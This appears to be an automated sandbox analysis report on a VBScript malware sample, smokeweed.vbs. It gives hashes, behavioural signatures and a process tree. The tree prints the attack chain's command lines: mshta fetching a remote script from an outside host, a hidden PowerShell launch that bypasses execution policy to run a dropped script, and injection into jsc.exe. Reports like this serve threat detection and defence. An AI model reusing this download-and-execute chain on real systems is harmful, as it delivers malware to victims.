Analysis
max time kernel: 24s
max time network: 152s
platform: windows7_x64
resource: win7v20201028
submitted: 26-02-2021 08:13
Static task: static1
Behavioral task: behavioral1
Sample: smokeweed.vbs
Resource: win7v20201028
General
Target: smokeweed.vbs
Size: 3KB
MD5: 07b8be238ea7e4d28ab60dd6c485f663
SHA1: 73c2226a8592f0a729a837013d40e5b55ecb4415
SHA256: 78a881cbc86ce0458d8db0eae0c92a8e016537796ef3ab7928037f4a51d4ca2f
SHA512: 9d1bcf4a17c4b7986e2fec74f0d4ba020ea2e4933ff9cad19a639d87f0998a32439a227bcd55bf37d08886276a11ede28f06a60af12b6a368b5cdbd2544cf7a0
Signatures

Blocklisted process makes network request (3 IoCs)
Processes:
  flow  pid   process
  6     1760  mshta.exe
  8     1760  mshta.exe
  9     1680  powershell.exe

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow  ioc
  10    ip-api.com

Suspicious use of SetThreadContext (1 IoC)
Processes:
  description            pid   process         target pid  target process
  set thread context of  1680  powershell.exe  1792        jsc.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies Internet Explorer settings
Processes:
  description  ioc                                                                                                       process
  Key created  \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe

Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes:
  pid   process
  708   powershell.exe
  708   powershell.exe
  1680  powershell.exe
  1680  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  708   powershell.exe
  Token: SeDebugPrivilege  1680  powershell.exe
  Token: SeDebugPrivilege  1792  jsc.exe

Suspicious use of WriteProcessMemory (21 IoCs)
Processes (identical rows collapsed; the count column gives the number of recorded writes):
  description                         pid   process         target pid  target process  count
  PID 292 wrote to memory of 1440     292   WScript.exe     1440        WScript.exe     3
  PID 1440 wrote to memory of 1760    1440  WScript.exe     1760        mshta.exe       3
  PID 1760 wrote to memory of 708     1760  mshta.exe       708         powershell.exe  3
  PID 1440 wrote to memory of 1680    1440  WScript.exe     1680        powershell.exe  3
  PID 1680 wrote to memory of 1792    1680  powershell.exe  1792        jsc.exe         9
Processes (indented by depth in the process tree; the leading number is the depth)

1  C:\Windows\System32\WScript.exe  (PID 292)
   "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\smokeweed.vbs"
   - Suspicious use of WriteProcessMemory
  2  C:\Windows\System32\WScript.exe  (PID 1440)
     "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\smokeweed.vbs" /elevate
     - Suspicious use of WriteProcessMemory
    3  C:\Windows\System32\mshta.exe  (PID 1760)
       "C:\Windows\System32\mshta.exe" https://z.zz.ht/bBtXS.txt
       - Blocklisted process makes network request
       - Modifies Internet Explorer settings
       - Suspicious use of WriteProcessMemory
      4  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 708)
         "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
    3  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1680)
       "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command C:\Users\Public\Datax.ps1;
       - Blocklisted process makes network request
       - Suspicious use of SetThreadContext
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken
       - Suspicious use of WriteProcessMemory
      4  C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe  (PID 1792)
         "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
         - Suspicious use of AdjustPrivilegeToken
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 445e625b0e5c155c88686d118ea2bf81
  SHA1: a96aa3a608e8d51cc77f6fd26545fb1500fca707
  SHA256: db8990261e2fb46cafc5e008d7e50a0494d24ad666d31812137ad753250fa7fa
  SHA512: 5850920b93438b970671038900c14663fb506e085c7acf5c3494059cc6114cc5ae2c8b468acc56dcb0be77adc3417a7206ee81a5614eac3cdc3a5118391f0e70

C:\Users\Public\Datax.ps1
  MD5: c85a52e535d54935f25bc43e8b393b1a
  SHA1: 963baebff776005de53b5c68608c5c5205400b50
  SHA256: 0545f59b84c4323711d72e396797694068bd7a56695aea0cdd90352a4a0c7753
  SHA512: 729398ee2dbb41b6f38c106dd3a75fbb695f700b009e6f5267f4242588764a5b3b407b7e2fbb17f9fd4cfc8684e04c39c2e68b6b400de750c2c2c4967d49f184